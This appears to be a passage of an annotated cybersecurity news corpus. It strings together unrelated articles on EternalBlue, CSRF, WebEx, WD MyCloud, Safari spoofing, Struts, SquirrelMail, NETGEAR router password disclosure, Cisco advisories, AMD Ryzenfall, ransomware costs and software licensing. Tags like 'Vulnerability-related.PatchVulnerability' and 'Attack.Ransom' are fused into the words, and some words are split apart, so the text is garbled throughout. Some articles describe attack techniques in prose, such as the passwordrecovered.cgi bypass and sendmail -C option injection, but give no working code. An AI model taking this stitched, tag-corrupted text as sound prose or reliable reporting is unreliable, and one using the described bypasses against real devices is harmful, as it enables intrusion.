A flaw in unpatched versions of Window 10 could leave machines vulnerableVulnerability-related.DiscoverVulnerabilityto EternalBlue , the remote kernel exploit behind the recent WannaCry ransomware attackAttack.Ransom. WannaCry targeted a Server Message Block ( SMB ) critical vulnerability that Microsoft patchedVulnerability-related.PatchVulnerabilitywith MS17-010 on March 14 , 2017 . While WannaCry damageAttack.Ransomwas mostly limited to machines running Windows 7 , a different version of EternalBlue could infect Windows 10 . Researchers at RiskSense stripped the original leaked version of EternalBlue down to its essential components and deemed parts of the data unnecessary for exploitation . They found they could bypass detection rules recommended by governments and antivirus vendors , says RiskSense senior security researcher Sean Dillon . This version of EternalBlue , an exploit initially released by Shadow Brokers earlier this year , does not use the DoublePulsar payload common among other exploits leaked by the hacker group . DoublePulsar was the main implant used in WannaCryAttack.Ransomand a key focus for defenders . `` That backdoor is unnecessary , '' says Dillon , noting how it 's dangerous for businesses to only focus on DoublePulsar malware . `` This exploit could directly load malware onto the system without needing to install the backdoor . '' EternalBlue gives instant un-credentialed remote access to Windows machines without the MS17-010 patch update . While it 's difficult to port EternalBlue to additional versions of Windows , it 's not impossible . Unpatched Windows 10 machines are at risk , despite the fact that Microsoft 's newest OS receives exploit mitigations that earlier versions do n't . The slimmed-down EternalBlue can be ported to unpatched versions of Windows 10 and deliver stealthier payloads . An advanced malware would be able to target any Windows machine , broadening the spread of an attack like WannaCry , Dillon explains . It 's worth noting WannaCry was a blatant , obvious attack , he says , and other types of malware , like banking spyware and bitcoin miners , could more easily fly under the radar . `` These can infect a network and you wo n't know about it until years later , '' he says . `` It 's a threat to organizations that have been targets , like governments and corporations . Attackers may try to get onto these networks and lay dormant … then stealAttack.Databreachintellectual property or cause other damage . '' Dillon emphasizes the importance of updatingVulnerability-related.PatchVulnerabilityto the latest version of Windows 10 , but says patchingVulnerability-related.PatchVulnerabilityalone wo n't give complete protection from this kind of threat . Businesses with SMB facing the Internet should also put up firewalls , and set up VPN access for users who need external access to the internal network . Businesses should have a good inventory of software and devices on their networks , along with processes for identifying and deployingVulnerability-related.PatchVulnerabilitypatches as they are releasedVulnerability-related.PatchVulnerability, says Craig Young , computer security researcher for Tripwire 's Vulnerability and Exposures Research Team ( VERT ) . This will become even more critical as attackers move quickly from patch to exploit . There will always be a window of opportunity for attackers before the right patches are installedVulnerability-related.PatchVulnerability, Young notes . EternalBlue is a `` very fresh vulnerability '' given that most breaches that use exploits leverage flaws that have been publicly knownVulnerability-related.DiscoverVulnerabilityfor an average of two years or more . `` EternalBlue is a particularly reliable exploit that gives access to execute code at the very highest privilege level , so I would expect that hackers and penetration testers will get a lot of use out of it for years to come , '' he says .
A decade ago , cross-site request forgery ( CSRF , often pronounced “ c-surf ” ) was considered to be a sleeping giant , preparing to wake and inflict havoc on the Worldwide Web . But the doomsday scenario never materialized and you don ’ t even seem to hear much about it anymore . In this blog post , part 1 of 2 , I will explore this idea and try to understand why the CSRF giant never awoke . First we ’ ll cover the overall threat landscape , trends , and some notable CSRF exploits throughout the years , including one from personal experience . As a quick review , CSRF exists because web applications trust the cookies sent by web browsers within an HTTP request . In a CSRF attack , the attacker causes a victim ’ s browser to make a request that results in a change or action which benefits the attacker ( and/or harms the victim ) in some way . Without a specific defense – like a random token in the request body that is validated on the server side – CSRF attacks are possible . After a bit of testing , my suspicions were confirmed . All requests that caused any sort of change could be exploited with CSRF . This included : I contacted the company to let them knowVulnerability-related.DiscoverVulnerabilityabout these security holes . Surprisingly , they didn ’ t seem to be aware there was such a thing as CSRF , but they thanked me anyway and rolled outVulnerability-related.PatchVulnerabilitya fix about a month later . There have been other notable instances of CSRF vulnerabilities with some of them being exploitedVulnerability-related.DiscoverVulnerabilityin the wild . Drive-by pharming is an attack on the DNS settings of home routers and modems and often leverages CSRF as a key element . The web UIs on these devices are the culprit , because they allow users to edit configuration settings . In one attack from 2008 , banking customers in Mexico who owned 2Wire DSL modems were targeted . Victims received an email with an embedded image tag with a CSRF attack that changed the DNS settings on their modem . In another instance , tens of thousands of Twitter users fell victim to a CSRF worm in 2010 when developers failed to implement anti-CSRF measures for tweets . The vulnerability was discoveredVulnerability-related.DiscoverVulnerabilityand exploitedVulnerability-related.DiscoverVulnerabilityin a rather distasteful but harmless way . When authenticated Twitter users visited the web page containing the exploit , they unknowingly posted two tweets – one with a link to the same page and another with a message about goats . Anyone who clicked on the link in the first tweet also posted the same two tweets . The worm spread like wildfire before it was fixed by Twitter . In 2012 Facebook ’ s App Center was vulnerableVulnerability-related.DiscoverVulnerabilityto CSRF and the security researcher who discoveredVulnerability-related.DiscoverVulnerabilitythe flaw was awarded $ 5000 as a bounty . Interestingly , in this case the HTTP request included an anti-CSRF token that appeared at first glance to provide protection , but the token was not being validated by the server-side application when the request was received . A Qualys researcher found other examples where anti-CSRF tokens were not properly validated . And similar to the Facebook issue mentioned above , PayPal in 2016 did not validate the anti-CSRF token in paypal.me . An attacker could only change a user ’ s profile photo in that case however .
The big security issue of the week is a remote code execution hole related to the Cisco WebEx service . WebEx is a popular collaboration tool for online events such as meetings , webinars and videoconferences . Like many services of this sort , you access online events via your browser , augmented by a special-purpose browser extension . Browser extensions and plugins allow web developers to extend the software features inside your browser with a mixture of scripts and program code , for example to add configuration options or to support new audio and video formats . Of course , when you add another layer of programmatic complexity on top of an already-complex browser , it ’ s easy to add new security holes , too . Perhaps the best known example of a problematic plugin is Adobe Flash , which has provided cybercrooks with such a fruitful source of exploitable security holes over the years that we have long been urging you to try to live without Flash altogether . The latest security scareVulnerability-related.DiscoverVulnerabilityof this sort has been dubbed CVE-2017-3823 , and it applies to Cisco ’ s special-purpose WebEx browser extension . In oher words , if your organisation uses WebEx , you probably have the browser extension installed , and if you have it installed , you may be at risk . According to Tavis Ormandy at Google ’ s Project Zero , who discoveredVulnerability-related.DiscoverVulnerabilityand documentedVulnerability-related.DiscoverVulnerabilitythe bug , there are more than 20 million WebEx users worldwide . According to Cisco , Internet Explorer , Chrome and Firefox on Windows are affected . Microsoft Edge on Windows and all browsers on Mac and Linux are safe . The most recent update for Chrome is Cisco WebEx extension 1.0.7 . Cisco published a notification about this update at 2017-01-26T19:45Z , having issued and then withdrawn 1.0.3 and then 1.0.5 earlier this week after deeming them “ incomplete ” . However , at 2017-01-26T19:45Z , Cisco ’ s official Security Advisory page says : Cisco is currently developingVulnerability-related.PatchVulnerabilityupdates that addressVulnerability-related.PatchVulnerabilitythis vulnerability for Firefox and Internet Explorer . There are no workarounds that address this vulnerability . Using Microsoft Edge on Windows or any browser on Mac or Linux will shield you from this bug because it doesn ’ t apply on those platforms . You can also turn off WebEx support in your browser temporarily , thus preventing the Cisco extension or add-on from activating unexpectedly .
DiscoveredVulnerability-related.DiscoverVulnerabilityby a security researcher who goes by the name of Zenofex , these security flaws have not been reportedVulnerability-related.DiscoverVulnerabilityto Western Digital , are still unpatchedVulnerability-related.PatchVulnerability, and with public exploit code is available for more than half of the vulnerabilities . According to Zenofex multiple WD MyCloud NAS device models are affectedVulnerability-related.DiscoverVulnerability, such as : Zenofex 's decision not to informVulnerability-related.DiscoverVulnerabilityWestern Digital came after the researcher attended a security conference last year , where other infosec professionals complained about Western Digital ignoring vulnerability reportsVulnerability-related.DiscoverVulnerability. It was at the same conference , Black Hat USA 2016 , where Western Digital also won a Pwnie Award in a category called `` Lamest Vendor Response . '' `` Ignoring these bugs would leave the vulnerable devices online for longer periods while responsible disclosureVulnerability-related.DiscoverVulnerabilityis worked out , '' Zenofex argued his decision not to wait until Western Digital patchesVulnerability-related.DiscoverVulnerabilitythe security bugs . `` Instead we ’ re attempting to alertVulnerability-related.DiscoverVulnerabilitythe community of the flaws and hoping that users remove their devices from any public facing portions of their networks , limiting access wherever possible , '' he added . Zenofex , who 's a member of the Exploitee.rs community , says he foundVulnerability-related.DiscoverVulnerabilitya whopping total of 85 security issues . Based on the exploit code , many of these security flaws can be exploitedVulnerability-related.DiscoverVulnerabilityby altering cookie values or embedding shell commands in cookie parameters . When the image loads inside their browser , the exploit code executes against the local NAS drive and takes over the device . The most severe of these issues , according to Zenofex , is authentication bypass issue , which ironically was also the easiest to exploit , requiring only the modification of cookie session parameters . And since Murphy 's Law applies to hardware devices as well , things went wrong all the way , and the commands are n't executed under a limited user , but run under root , giving attackers full control over affected devices , allowing them to upload or download data at will .
A flaw in Safari – that allows an attacker to spoofAttack.Phishingwebsites and trickAttack.Phishingvictims into handing over their credentials – has yet to be patchedVulnerability-related.PatchVulnerability. A browser address bar spoofing flaw was foundVulnerability-related.DiscoverVulnerabilityby researchers this week in Safari – and Apple has yet issueVulnerability-related.PatchVulnerabilitya patch for the flaw . Researcher Rafay Baloch on Monday disclosedVulnerability-related.DiscoverVulnerabilitytwo proof-of-concepts revealingVulnerability-related.DiscoverVulnerabilityhow vulnerabilities in Edge browser 42.17134.1.0 and Safari iOS 11.3.1 could be abused to manipulate the browsers ’ address bars , tricking victims into thinking they are visiting a legitimate website . Baloch told Threatpost Wednesday that Apple has promised to fixVulnerability-related.PatchVulnerabilitythe flaw in its next security update for Safari . “ Apple has told [ me ] that the latest beta of iOS 12 also addressesVulnerability-related.PatchVulnerabilitythe issue , however they haven ’ t provided any dates , ” he said . Apple did not respond to multiple requests for comment from Threatpost . Microsoft for its part has fixedVulnerability-related.PatchVulnerabilitythe vulnerability Baloch foundVulnerability-related.DiscoverVulnerabilityin the Edge browser , ( CVE-2018-8383 ) in its August Patch Tuesday release . According to Microsoft ’ s vulnerability advisory releasedVulnerability-related.PatchVulnerabilityAugust 14 , the spoofing flaw exists because Edge does not properly parse HTTP content . Both flaws stem from the Edge and Safari browsers allowing JavaScript to update the address bar while the page is still loading . This means that an attacker could request data from a non-existent port and , due to the delay induced by the setInterval function , trigger the address bar spoofing . The browser would then preserve the address bar and load the content from the spoofed page , Baloch said in his blog breaking down both vulnerabilities . From there , the attacker could spoofAttack.Phishingthe website , using it to lureAttack.Phishingin victims and potentially gather credentials or spread malware . For instance , the attacker could sendAttack.Phishingan email message containing the specially crafted URL to the user , convince the user to click it , and take them to the link which could gather their credentials or sensitive information . “ As per Google , Address bar is the only reliable indicator for ensuring the identity of the website , if the Address bar points to Facebook.com and the content is hosted on attacker ’ s website , there is no reason why someone would not fall for this , ” Baloch told Threatpost . In a video demonstration , Baloch showed how he could visit a link for the vulnerable browser on Edge ( http : //sh3ifu [ . ] com/bt/Edge-Spoof.html ) , which would take him to a site purporting to beAttack.PhishingGmail login . However , while the URL points to a Gmail address , the content is hosted on sh3ifu.com , said Baloch . The Safari proof-of-concept is similar , except for one constraint where it does not allow users to type their information into the input boxes while the page is in a loading state . However , Bolach said he was able to circumvent this restriction by injecting a fake keyboard using Javascript – a common practice in banking sites . No other browsers – including Chrome or Firefox – were discoveredVulnerability-related.DiscoverVulnerabilityto have the flaw , said Baloch . Baloch is known for discoveringVulnerability-related.DiscoverVulnerabilitysimilar vulnerabilities in Chrome , Firefox and other major browsers in 2016 , which also allowed attackers to spoof URLs in the address bar . The vulnerabilities were disclosedVulnerability-related.DiscoverVulnerabilityto both Microsoft and Apple and Baloch gave both a 90-day deadline before he went publicVulnerability-related.DiscoverVulnerabilitywith the flaws . Due to the Safari browser bug being unpatchedVulnerability-related.PatchVulnerability, Baloch said he has not yet released a Proof of Concept : “ However considering there is a slight difference between the Edge browser POC and Safari , anyone with decent knowledge of Javascript can make it work on Safari , ” he told us .
Cisco 's Talos says they 've observedVulnerability-related.DiscoverVulnerabilityactive attacks against a Zero-Day vulnerability in Apache 's Struts , a popular Java application framework . Cisco started investigatingVulnerability-related.DiscoverVulnerabilitythe vulnerability shortly after it was disclosedVulnerability-related.DiscoverVulnerability, and foundVulnerability-related.DiscoverVulnerabilitya number of active attacks . In an advisory issued on Monday , Apache saysVulnerability-related.DiscoverVulnerabilitythe problem with Struts exists within the Jakarta Multipart parser . `` It is possible to perform a RCE attack with a malicious Content-Type value . If the Content-Type value is n't valid an exception is thrown which is then used to display an error message to a user , '' the warning explained . `` If you are using Jakarta based file upload Multipart parser , upgradeVulnerability-related.PatchVulnerabilityto Apache Struts version 2.3.32 or 2.5.10.1 . You can also switch to a different implementation of the Multipart parser . '' The alternative is the Pell parser plugin , which uses Jason Pell 's multipart parser instead of the Common-FileUpload library , Apache explains . In addition , administrators concerned about the issue could just apply the proper updates , which are currently availableVulnerability-related.PatchVulnerability. In a blog post , Cisco said they discovered a number of attacks that seem to be leveraging a publicly released proof-of-concept to run various commands . Such commands include simple ones ( 'whoami ' ) as well as more sophisticated ones , including pulling down malicious ELF executable and running it . An example of one attack , which attempts to copy the file to a harmless directory , ensure the executable runs , and that the firewall is disabled is boot-up , is below : Both Cisco and Apache urge administrators to take action , either by patchingVulnerability-related.PatchVulnerabilityor ensuring their systems are not vulnerable . This is n't the first time the Struts platform has come under attack . In 2013 , Chinese hackers were using an automated tool to exploit known vulnerabilities in order to install a backdoor .
Global software industry advocate BSA | The Software Alliance is warning Australian organisations to be mindful of the security risks involved with using unlicensed software after it settled with a record number of infringement settlements last year . A total of 28 case settlements for the use of unlicensed software occurred in 2017 – twice the amount in 2016 . The 28 settlements were worth more than $ 347,000 in damages against businesses across Australia . BSA warns that with the Notifiable Data BreachesAttack.Databreachlegislation now in effect , this is a good time for organisations to consider the risks unlicensed software bring to their business . “ Businesses need to remember that unlicensed software , or software downloaded from an unknown source , may contain malware which puts an organisation and its customers at significant risk of becoming the victim of a data breachAttack.Databreach, ” comments BSA APAC ’ s director of compliance programs , Gary Gan . “ Without properly licensed software , organisations don ’ t receiveVulnerability-related.PatchVulnerabilitypatch updates which strengthen the software ’ s security and addressVulnerability-related.PatchVulnerabilityvulnerabilities , which otherwise would leave the business exposed. ” One of the 28 settlements involved a Western Australia-based energy company that was found using unlicensed software . The settlement amounted to more than $ 40,000 . Every business caught using unlicensed software had to purchase genuine software licenses for ongoing use on top of the copyright infringement damages . “ It ’ s especially important that organisations are ensuring they ’ re doing all they can to protect their data given the recent introduction of NDB legislation . In order to stay on top of their software licensing , businesses should consider investing in SAM tools . The potential consequences faced by businesses that are found to be using unlicensed software far outweighs the cost of investment into SAM , something that all businesses should be considering , ” Gan continues . The BSA continues to clamp down on unlawful use of its members ’ software . Members include Adobe , Apple , IBM , Microsoft , Okta , Oracle , Symantec , Trend Micro and Workday , amongst others . BSA offers up to $ 20,000 to eligible recipients who disclose accurate information regarding unlawful copying or use of BSA members ’ software . Potential recipients must provide assistance and evidence to support the information , as may be required by the BSA ’ s legal advisers , in connection with any claim or legal proceedings initiated by the BSA members . BSA says it remains committed to its role in raising awareness of the risks to businesses when using unlicensed software and the damaging effects that software piracy has on the Australian IT industry .
Ransomware is costingAttack.RansomUK companies a whopping £346 million every year , despite Britain being labelled ‘ the most resolute ’ country for dealing with the cyber attacksAttack.Ransom. In fact , more than 40 per cent of mid-large UK business suffered on average five ransomware attacksAttack.Ransomduring the last year , according to research by Vanson Bourne . However , 92 per cent of security professionals feel confident in their ability to combat ransomware in the future . And there was more good news for British . The survey found the UK to be the most resolute , both in refusing to pay ransom demandsAttack.Ransom, as well as the most effective in combatting them . They experience the fewest number of attacks : 40 per cent , versus 70 per cent in Germany , 59 per cent in France and 55 per cent in the USA and enjoy a 43 per cent success rate in successfully defending against attacks . The research , commissioned by SentinelOne , reveals that ransomware is costingAttack.Ransomindividual businesses around the globe an average of £591,238 per annum . The research all concluded that the number of companies ravaged by ransomware is on the rise . Results show that the overall percentage of companies experiencing ransomware has increased from 48 per cent in 2016 to 56 per cent in 2018 , however the average number per year has fallen from six to five attacks . The amount of time spent decrypting ransomware attacksAttack.Ransomhas also increased from 33 to 40 man-hours . The study also reveals that employees are considered the major culprits responsible for introducing the malware into the business . This was further supported by the fact that phishingAttack.Phishing, which seeks to socially engineer employees , was the top attack vector by which ransomware infiltrated the business in 69 per cent of instances . Migo Kedem , director of Product Management at SentinelOne said : “ It ’ s staggering to see the cost to British businesses of £346 million . This figure shows that businesses are becoming increasingly aware that it ’ s not just the ransom demandAttack.Ransom, but rather the ancillary costs of downtime , staff time , lost business , as well as the data recovery costs and reputational damage that are the biggest concern to British businesses. ” He added : “ On a more positive note , it ’ s good to see CISOs feeling more bullish about their ability to tackle ransomware using the latest behavioural AI-based end-point technology . It ’ s also encouraging to see a clear movement against companies caving in to ransomware demandsAttack.Ransom, preferring instead to take more proactive measure such as back-ups and patchingVulnerability-related.PatchVulnerabilityof vulnerable systems . However , the volume of ransomware attacksAttack.Ransomis still increasing and their speed , scale , sophistication and success in evading detection with the growth in file-less and memory-based malware , explains why ransomware will continue to be a major threat to CISOs in 2018 and beyond . ”
Users of open source webmail software SquirrelMail are open to remote code execution due to a bug ( CVE-2017-7692 ) discoveredVulnerability-related.DiscoverVulnerabilityindependently by two researchers . “ If the target server uses Sendmail and SquirrelMail is configured to use it as a command-line program , it ’ s possible to trick sendmail into using an attacker-provided configuration file that triggers the execution of an arbitrary command , ” the explanation provided by MITRE reads . “ For exploitation , the attacker must upload a sendmail.cf file as an email attachment , and inject the sendmail.cf filename with the -C option within the ‘ Options > Personal Informations > Email Address ’ setting. ” The bug was foundVulnerability-related.DiscoverVulnerabilityby researchers Filippo Cavallarin and Dawid Golunski , independently of one another , and affects SquirrelMail versions 1.4.22 and below . Golunski reportedVulnerability-related.DiscoverVulnerabilityit to SquirrelMail ( sole ) developer Paul Lesniewski , who asked for a delay of publication of the details until he could fixVulnerability-related.PatchVulnerabilitythe flaw . But as Cavallarin publishedVulnerability-related.DiscoverVulnerabilitydetails about it last week ( after not receiving any reply by the SquirrelMail developer ) , Golunski did the same during the weekend . Both researchers providedVulnerability-related.DiscoverVulnerabilitya proof-of-concept exploit for the flaw , and Cavallarin even offeredVulnerability-related.PatchVulnerabilityan unofficial patch for pluggingVulnerability-related.PatchVulnerabilitythe hole . All this prompted Lesniewski to push outVulnerability-related.PatchVulnerabilitya patch on Monday , and new , patched version snapshots of the software ( 1.4.23-svn and 1.5.2-svn ) . He also told The Register that exploitation of the bug is difficult to pull off . “ In order to exploit the bug , a malicious user would need to have already gained control over a mail account by other means , SquirrelMail would need to be configured to allow users to change their outgoing email address ( we recommend keeping this disabled ) , the user would need to determine the location of the attachments directory ( by gaining shell access or making guesses ) , the permissions on said directory and files would need to allow access by other processes ( by default this will usually be the case , but prudent admins will exert more stringent access controls ) and of course , SquirrelMail needs to be configured to send via Sendmail and not SMTP ( default is SMTP ) , ” he explained . Still , according to Golunski , the 1.4.23 version snapshot offeredVulnerability-related.PatchVulnerabilityon Monday was still vulnerableVulnerability-related.DiscoverVulnerability. But another one was pushed outVulnerability-related.PatchVulnerabilitytoday , so it ’ s possible that the issue was finally , definitely fixedVulnerability-related.PatchVulnerability. Users can wait to update their installation until things become more clear , and in the meantime , they can protect themselves by configuring their systems not to use Sendmail .
The Managing Director of a company h eld to ransom Attack.Ransomby hackers has warned other bosses to protect themselves against cyber crooks − or run the risk of web sharks crippling their businesses . Stuart Kettell − owner of audio-visual specialist Kettell Video Productions − was targeted by tech scammers who infiltrated his firm ’ s IT systems with malware that infected its network of files . They d emanded Attack.Ransom£1,000 initially in Bitcoins to decrypt the malicious software − and warned that failure to p ay Attack.Ransomwould render the files permanently inaccessible . Thankfully Stuart routinely backs-up all company systems − and even backs up the back-ups − so survived the online attack relatively unscathed . But he ’ s warned that without the archive of replicas his entire business could have collapsed . He said : “ I noticed all my photos , videos and pdf files ghosting to white with a new filename…it attacked my desktop first then it wormed its way into folders one file at a time every few seconds . “ I ’ ve no idea how the malware was introduced as we use software that ’ s designed to prevent against such attacks . And t he demand for payment Attack.Ransomseemed very professional : I was given links where I could buy Bitcoins and even offered the chance to decrypt one file for free ! “ I unplugged my computer , isolated it from the internet , and ran some anti-malware software to stop the virus spreading further . “ It was scary : I had no idea about cyber-attacks before and really didn ’ t know what to do . Critical files , including images and videos for clients , were wiped out along with a lifetime of personal memories . “ The affected files were lost for good − the only way to recover them was with the key code held by the blackmailer − but luckily I back-up everything to an external data cartridge . In the end it was more an inconvenience…but it could have threatened the business . “ I would strongly urge all business owners to back-up their essential files . '' Sergeant Gary Sirrell from the cybercrime team at West Midlands Regional Organised Crime Unit said commercial web attacks are increasingly being committed against smaller firms and not big multi-nationals . He explained : “ Small and medium sized companies are easier targets : they often don ’ t have the resources or expertise to protect against cyberattacks . And if they are targeted , the impact can be devastating . “ But there are steps business owners can take to mitigate the risk . A really effective tactic involves ‘ layering ’ defences to include a firewall , anti-malware software , staff training and regular re-training ) around phishing email awareness , and finally to p lug Vulnerability-related.PatchVulnerabilityany holes in your defences by u pdating Vulnerability-related.PatchVulnerabilitysoftware patches and updates in a timely manner . “ By exercising good cyber hygiene , and having a strong backup policy , Stuart avoided the dilemma of whether to see his business significantly damaged , or to have to hand over a ransom Attack.Ransomto organised crime gangs to get his data unlocked . “ If more businesses in the West Midlands proactively took such steps there would be significantly fewer crimes victims . ''
Home routers are the first and sometimes last line of defense for a network . Despite this fact , many manufacturers of home routers fail to properly audit their devices for security issues before releasing them to the market . As security researchers , we are often disappointed to rediscover that this is not always the case , and that sometimes these vulnerabilities simply fall into our hands during our day-to-day lives . Such is the story of the two NETGEAR vulnerabilities I want to shareVulnerability-related.DiscoverVulnerabilitywith you today : It was a cold and rainy winter night , almost a year ago , when my lovely NETGEAR VEGN2610 modem/router lost connection to the Internet . I was tucked in bed , cozy and warm , there was no way I was going downstairs to reset the modem , `` I will just reboot it through the web panel '' I thought to myself . Unfortunately I could n't remember the password and it was too late at night to check whether my roommates had it . I considered my options : Needless to say , I chose the latter . I thought to myself , `` Well , it has a web interface and I need to bypass the authentication somehow , so the web server is a good start . '' I started manually fuzzing the web server with different parameters , I tried `` .. / .. '' classic directory traversal and such , and after about 1 minute of fuzzing , I tried `` … '' and I got this response : Fig 1 : unauth.cgi `` Hmm , what is that unauth.cgi thingy ? Luckily for me the Internet connection had come back on its own , but I was now a man on a mission , so I started to look around to see if there were any known vulnerabilities for my VEGN2610 . I started looking up what that `` unauth.cgi '' page could be , and I found 2 publicly disclosedVulnerability-related.DiscoverVulnerabilityexploits from 2014 , for different models that manage to do unauthenticated password disclosure . Those two guys found outVulnerability-related.DiscoverVulnerabilitythat the number we get from unauth.cgi can be used with passwordrecovered.cgi to retrieve the credentials . I tested the method described in both , and voila - I have my password , now I can go to sleep happy and satisfied . I woke up the next morning excited by the discovery , I thought to myself : `` 3 routers with same issue… Coincidence ? Luckily , I had another , older NETGEAR router laying around ; I tested it and bam ! I started asking people I knew if they have NETGEAR equipment so I could test further to see the scope of the issue . In order to make life easier for non-technical people I wrote a python script called netgore , similar to wnroast , to test for this issue . I am aware of that and that is why I do n't work as a full time programmer . As it turned out , I had an error in my code where it did n't correctly take the number from unauth.cgi and passed gibberish to passwordrecovered.cgi instead , but somehow it still managed to get the credentials ! After few trials and errors trying to reproduce the issue , I foundVulnerability-related.DiscoverVulnerabilitythat the very first call to passwordrecovered.cgi will give out the credentials no matter what the parameter you send . This is totally new bug that I have n't seen anywhere else . When I tested both bugs on different NETGEAR models , I foundVulnerability-related.DiscoverVulnerabilitythat my second bug works on a much wider range of models . A full description of both of these findings as well as the python script used for testing can be found here . The vulnerabilities have been assignedVulnerability-related.DiscoverVulnerabilityCVE-2017-5521 and TWSL2017-003 . The Responsible Disclosure Process This is where the story of discovery ends and the story of disclosure begins . Following our Responsible Disclosure policy we sent both findingsVulnerability-related.DiscoverVulnerabilityto NETGEAR in the beginning of April 2016 . In our initial contact , the first advisory had 18 models listed as vulnerableVulnerability-related.DiscoverVulnerability, although six of them did n't have the vulnerability in the latest firmware . Perhaps it was fixedVulnerability-related.PatchVulnerabilityas part of a different patch cycle . The second advisory included 25 models , all of which were vulnerableVulnerability-related.DiscoverVulnerabilityin their latest firmware version . In June NETGEAR published a notice that providedVulnerability-related.PatchVulnerabilitya fix for a small subset of vulnerable routers and a workaround for the rest . They also made the commitment to working toward 100 % coverage for all affected routers . The notice has been updated several time since then and currently contains 31 vulnerable models , 18 of which are patchedVulnerability-related.PatchVulnerabilitynow , and 2 models that they previously listed as vulnerableVulnerability-related.DiscoverVulnerability, but are now listed as not vulnerableVulnerability-related.DiscoverVulnerability. In fact , our tests show that one of the models listed as not vulnerableVulnerability-related.DiscoverVulnerability( DGN2200v4 ) is , in fact , vulnerable and this can easily be reproduced with the POC provided in our advisory . Over the past nine months we attempted to contact NETGEAR multiple times for clarification and to allow them time to patchVulnerability-related.PatchVulnerabilitymore models . Over that time we have foundVulnerability-related.DiscoverVulnerabilitymore vulnerable models that were not listed in the initial notice , although they were added later . We also discoveredVulnerability-related.DiscoverVulnerabilitythat the Lenovo R3220 router is powered by NETGEAR firmware and it was vulnerableVulnerability-related.DiscoverVulnerabilityas well . Luckily NETGEAR did eventually get back to us right before we were set to discloseVulnerability-related.DiscoverVulnerabilitythese vulnerabilities publicly . We were a little skeptical since our experience to date matched that of other third-party vulnerability researchers that have tried to responsibly discloseVulnerability-related.DiscoverVulnerabilityto NETGEAR only to be met with frustration . The first was that NETGEAR committed to pushing out firmware to the currently unpatched models on an aggressive timeline . The second change made us more confident that NETGEAR was not just serious about patchingVulnerability-related.PatchVulnerabilitythese vulnerabilities , but serious about changing how they handle third-party disclosure in general . We fully expect this move will not only smooth the relationship between third-party researchers and NETGEAR , but , in the end , will result in a more secure line of products and services . For starters , it affects a large number of models . We have foundVulnerability-related.DiscoverVulnerabilitymore than ten thousand vulnerable devices that are remotely accessible . The real number of affected devices is probably in the hundreds of thousands , if not over a million . The vulnerability can be used by a remote attacker if remote administration is set to be Internet facing .
Cisco Systems yesterday issued 17 security advisories , disclosingVulnerability-related.DiscoverVulnerabilityvulnerabilities in multiple products , including at least three critical flaws . One of them , a privileged access bug found inVulnerability-related.DiscoverVulnerabilityseven models of its Small Business Switches , has not yet been patchedVulnerability-related.PatchVulnerability, but the company has recommended a workaround to limit its potential for damage . Designated CVE-2018-15439 with a CVSS score of 9.8 , the unsolved privileged access vulnerability could allow a remote attacker to bypass an affected device ’ s user authentication mechanism and obtain full admin rights without the proper administrators being notified . Although there is currently no software fix , a Cisco advisory says users can implement a workaround by “ adding at least one user account with access privilege set to level 15 in the device configuration. ” Affected device models are the Cisco Small Business 200 Series Smart Switches , Small Business 300 Series Managed Switches , Small Business 500 Series Stackable Managed Switches , 250 Series Smart Switches , 350 Series Managed Switches , 350X Series Stackable Managed Switches and 550X Series Stackable Managed Switches . The other critical flaws confirmedVulnerability-related.DiscoverVulnerabilityin Cisco products were an authentication bypass vulnerability in the Stealthwatch Management Console of Cisco Stealthwatch Enterprise and a remote shell command execution bug in Unity Express . These also carry CVSS scores of 9.8 . Cisco published a fourth critical advisory warningVulnerability-related.DiscoverVulnerabilityof a remote code execution bug in the Apache Struts Commons FileUpload Library ; however , it is unknown at this time if any Cisco products and services are affected . Additional vulnerabilities were foundVulnerability-related.DiscoverVulnerabilityin the Cisco ’ s Meraki networking devices , Video Surveillance Media Server , Content Security Management Appliance , Registered Envelope Service , Price Service Catalog , Prime Collaboration Assurance , Meeting Server , Immunet and AMP for Endpoints , Firepower System Software , Energy Management Suite and Integrated Management Controller Supervisor . And in one final , odd advisory , Cisco acknowledged that a flub in its QA practices allowed dormant exploit code for the Dirty Cow vulnerability to be included in shipping software images for its Expressway Series and Cisco TelePresence Video Communication Server ( VCS ) software . “ The presence of the sample , dormant exploit code does not represent nor allow an exploitable vulnerability on the product , nor does it present a risk to the product itself as all of the required patches for this vulnerability have been integratedVulnerability-related.PatchVulnerabilityinto all shipping software images , ” said the advisory . “ The affected software images have proactively been removed from the Cisco Software Center and will soon be replacedVulnerability-related.PatchVulnerabilitywith fixed software images . ”
AMD has acknowledgedVulnerability-related.DiscoverVulnerabilitythe Ryzenfall vulnerabilities discoveredVulnerability-related.DiscoverVulnerabilityby CTS-Labs , though the chip company believes the flaws can be patchedVulnerability-related.PatchVulnerabilityvia BIOS updates issuedVulnerability-related.PatchVulnerabilityover the next few weeks . In a blog post authored by AMD ’ s chief technical officer , Mark Papermaster , AMD confirmed that the four broad classifications of attacks—Masterkey , Ryzenfall , Fallout , and Chimera—are viable , though they require administrative access to the PC or server in question . Third-party protection , such as Microsoft Windows Credential Guard , also serve to block unauthorized administrative access , Papermaster wrote . In any event , “ any attacker gaining unauthorized administrative access would have a wide range of attacks at their disposal well beyond the exploits identified in this research , ” AMD ’ s Papermaster added . But AMD also provided the answer to consumers ’ most pressing question : What , if anything , needs to be done ? For each of the first three classifications of vulnerabilities , AMD said it is working on firmware updates that the company plans to releaseVulnerability-related.PatchVulnerabilityduring the coming weeks . The fourth category of vulnerability , known as Chimera , affectedVulnerability-related.DiscoverVulnerabilitythe Promontory chipset , which CTS-Labs said was designed with logic supplied by ASMedia , a third-party vendor . While AMD said patches for that will also be releasedVulnerability-related.PatchVulnerabilityvia a BIOS update , the company said it is working with the Promontory chipset maker on developingVulnerability-related.PatchVulnerabilitythe mitigations , rather than supplying its own . AMD has neither confirmed nor denied whether the attacks can be executed remotely , or require local access . AMD did deny , however , that the attacks have anything to do with Meltdown or Spectre , the two side-channel attacks that rival Intel has worked to patchVulnerability-related.PatchVulnerability. About a week ago , CTS-Labs issued a press release as well as a website outlining the vulnerabilities , which the company provided to AMD less than 24 hours before CTS-Labs went public , AMD said . But CTS-Labs also drew fire over boilerplate copy on its website that implied a potential financial interest in the subjects of its reports . PCWorld attempted to interview CTS executives , but later rescinded that request after CTS-Labs representatives demanded a list of questions in advance , and also forbade us from asking about the timing and the company ’ s financial motivations . In the meantime , however , the vulnerabilities were confirmedVulnerability-related.DiscoverVulnerabilityby two independent researchers , Trail of Bits and Check Point . Both expressed doubts that attackers would be able to exploit the vulnerabilities that CTS-Labs had originally discoveredVulnerability-related.DiscoverVulnerability.
